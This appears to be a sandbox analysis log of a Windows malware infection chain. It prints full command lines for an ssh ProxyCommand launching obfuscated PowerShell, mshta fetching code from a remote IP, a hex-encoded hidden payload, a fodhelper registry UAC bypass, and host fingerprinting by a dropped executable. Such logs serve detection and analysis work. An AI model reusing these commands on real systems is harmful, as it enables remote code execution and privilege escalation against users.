          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nopJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command '|\|abh4q3w|fyzxmshta https://150.241.97.10/aaa.mp4|\|abh4q3w|fyzx'.substring(15, 35)" .
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('653adb09197706bff248b833ea1f27f5d58878713451ba8f31b442364ad50b177565132c81a8ce0c04335fb368b1bec213971455480775829f6bc6c5534155f957e2cfa508a5fe4c311e066403190fb60b4c1cbcaa36cdf33d5f614fd5f67a8c2528ebc6c4b5b8a0bce76a43045b19c3efd6f5ef3ba1ecb5686bd73b304c0491078b179da1ca0ae1f3da25490e7b58ee2ff863e346260adacb21649ff36146554f42d087971f82489ab30989e3f0674f581c0cf80616e540bcaa41b0428afce3f21fedf2f8472f6163e56ee7f1258524a03f60db1043baa3a075884983f2cf092375522f8988e476af72dc3c2fc7adc9fe0507992c92239aec2429066ebbd2b17cd0cf69b5f864c012338d6d8dd368382c5160478c96e06e3861df4b0a736f2572d32b9090b656b519c9ee189c51f0156b1592fee6ea266869208339b1f4a4cd0c9d18d67d96f8edeabc3c915510c81009138cdc34ed0e78c7b482df473e7eb8a0b3b274003f057ff8e56d8ee713118a6b7733a69e09e35c4f1734dc2cd1de6ac8baf5167083e43f074961524961b7179d937805ac28e554a85ffb0fce8ffc6971bd36500b19554e2cf2c414fd3f7d20f637c3fed2cbe4f16d815833af6587c0445b171f727757fcb88407da064e176d7ac09be6f81860913c206895922fa10cfc3d057e32f3236cb84f7ae4d8c4681039f91ad409d0ee7a284e00484796bdfd0c577c1033fc2b929938ae4ebe01ca086a4ef8df874cdfa55de6194b2add9fbbde3b65169b4ce6fc4c5d063449d421c5df87aeb418d87eb94d8085a780cff969515bfbeb7cdaa25c3e5ddf20fbb0a604b6ddaadcf97b9534a77f8a73360422df52b6736926bfb5d66ced1f6f797f1b6d9ade5e074859d887e8c3bad2d33a412611ba85a6107b8f004e605620d5e3f4fba15b1ff642ab09a70a27bfe4f97180e1a5489a15a3e5f7db53356e7f7869f6731f3815b6f7e852698335fa8bab0a12f68f66ee399ca6b7d1994fced4bfb476066214d61a279b592bede9bc4173840d28016672e7995c751b825a18ad0960afbbba9071cc631fad152ebe5d6da49db75b7bd20456369cda6719eca0462c83310f3f5ac28103792deeacdfa6a31d127726b84a5a8e39a884df8fecda2cdec9dc279c956d253761973c9ea36666f0c5dd4c4f3306483bf6811c7ed4f0265f0e66ff777c5bb9a9b4324c54769c9b5d706b4ec485997d1adb50fd71564b9401e52e3a3f5cbbccb76bed1b5cf3af43b7e7c4c42dea2a7f2e21992968faa86787095556c265abb0db1b02f1c5c06e0b96eb6b38f98aa3878e78e92a9d5fba55b149c8dd782681a530f1c11d94505305c1ee8ef1f25970104e28dff99776f3628512c465dc2125a38927e4cfd827415d33dc2de13d550c5cd8abcd58eff5ef4b7cdfe93710eb277c3304084bd9201e5dabdebe54faef993c8a690421ab366c5cf613f7cac0628aad89849b65fff1054cb508e8d107d332de6e06598c86c6e7b2aa72a92b5d11793da067088a83abf915b5b690ef77973fdd05902457333bf3d9982ddc982ca6e51de08faee2b7b87dc3b7d2556d18306a68f6827eb9c7a69cea51744ac77093a6ddafbede1293f9be816ebb61f0ad6d7c6984f007ad085896b84a1791374ae2d29767fa6682b78e157c46b6b622fb0cc14fd5acf701f64474b5d1afbad672c4e15effe1ca5fbb418a59ab3ce357c55b1cc5c02697ed0b7dc5750ff0a46291413a4591cfd4e3b029f565168af5ee6c643baba78a73e0e7f2e781a6f2bb5b74b6d360125440c06278e8e7ac7a76d248db1e208518388f10a6bab46d4c01520d56940cd56758727e9268671527569a7159b1296762de8d769ddaf8005189ed580c0a99027d6d7c7986c91bb71beb4cf71419813de3cc12b2befea0bd89c8803d19d50f5348e88eb7a49f42528fcf43aa90404ef92e9cd2fd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('653adb09197706bff248b833ea1f27f5d58878713451ba8f31b442364ad50b177565132c81a8ce0c04335fb368b1bec213971455480775829f6bc6c5534155f957e2cfa508a5fe4c311e066403190fb60b4c1cbcaa36cdf33d5f614fd5f67a8c2528ebc6c4b5b8a0bce76a43045b19c3efd6f5ef3ba1ecb5686bd73b304c0491078b179da1ca0ae1f3da25490e7b58ee2ff863e346260adacb21649ff36146554f42d087971f82489ab30989e3f0674f581c0cf80616e540bcaa41b0428afce3f21fedf2f8472f6163e56ee7f1258524a03f60db1043baa3a075884983f2cf092375522f8988e476af72dc3c2fc7adc9fe0507992c92239aec2429066ebbd2b17cd0cf69b5f864c012338d6d8dd368382c5160478c96e06e3861df4b0a736f2572d32b9090b656b519c9ee189c51f0156b1592fee6ea266869208339b1f4a4cd0c9d18d67d96f8edeabc3c915510c81009138cdc34ed0e78c7b482df473e7eb8a0b3b274003f057ff8e56d8ee713118a6b7733a69e09e35c4f1734dc2cd1de6ac8baf5167083e43f074961524961b7179d937805ac28e554a85ffb0fce8ffc6971bd36500b19554e2cf2c414fd3f7d20f637c3fed2cbe4f16d815833af6587c0445b171f727757fcb88407da064e176d7ac09be6f81860913c206895922fa10cfc3d057e32f3236cb84f7ae4d8c4681039f91ad409d0ee7a284e00484796bdfd0c577c1033fc2b929938ae4ebe01ca086a4ef8df874cdfa55de6194b2add9fbbde3b65169b4ce6fc4c5d063449d421c5df87aeb418d87eb94d8085a780cff969515bfbeb7cdaa25c3e5ddf20fbb0a604b6ddaadcf97b9534a77f8a73360422df52b6736926bfb5d66ced1f6f797f1b6d9ade5e074859d887e8c3bad2d33a412611ba85a6107b8f004e605620d5e3f4fba15b1ff642ab09a70a27bfe4f97180e1a5489a15a3e5f7db53356e7f7869f6731f3815b6f7e852698335fa8bab0a12f68f66ee399ca6b7d1994fced4bfb476066214d61a279b592bede9bc4173840d28016672e7995c751b825a18ad0960afbbba9071cc631fad152ebe5d6da49db75b7bd20456369cda6719eca0462c83310f3f5ac28103792deeacdfa6a31d127726b84a5a8e39a884df8fecda2cdec9dc279c956d253761973c9ea36666f0c5dd4c4f3306483bf6811c7ed4f0265f0e66ff777c5bb9a9b4324c54769c9b5d706b4ec485997d1adb50fd71564b9401e52e3a3f5cbbccb76bed1b5cf3af43b7e7c4c42dea2a7f2e21992968faa86787095556c265abb0db1b02f1c5c06e0b96eb6b38f98aa3878e78e92a9d5fba55b149c8dd782681a530f1c11d94505305c1ee8ef1f25970104e28dff99776f3628512c465dc2125a38927e4cfd827415d33dc2de13d550c5cd8abcd58eff5ef4b7cdfe93710eb277c3304084bd9201e5dabdebe54faef993c8a690421ab366c5cf613f7cac0628aad89849b65fff1054cb508e8d107d332de6e06598c86c6e7b2aa72a92b5d11793da067088a83abf915b5b690ef77973fdd05902457333bf3d9982ddc982ca6e51de08faee2b7b87dc3b7d2556d18306a68f6827eb9c7a69cea51744ac77093a6ddafbede1293f9be816ebb61f0ad6d7c6984f007ad085896b84a1791374ae2d29767fa6682b78e157c46b6b622fb0cc14fd5acf701f64474b5d1afbad672c4e15effe1ca5fbb418a59ab3ce357c55b1cc5c02697ed0b7dc5750ff0a46291413a4591cfd4e3b029f565168af5ee6c643baba78a73e0e7f2e781a6f2bb5b74b6d360125440c06278e8e7ac7a76d248db1e208518388f10a6bab46d4c01520d56940cd56758727e9268671527569a7159b1296762de8d769ddaf8005189ed580c0a99027d6d7c7986c91bb71beb4cf71419813de3cc12b2befea0bd89c8803d19d50f5348e88eb7a49f42528fcf43aa90404ef92e9cd2fdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
          Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32U
          Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: explorer.exeShell_TrayWnd
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,46_2_0306E2C8
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,46_2_0306D768
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Users\user\AppData\Roaming\mama.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
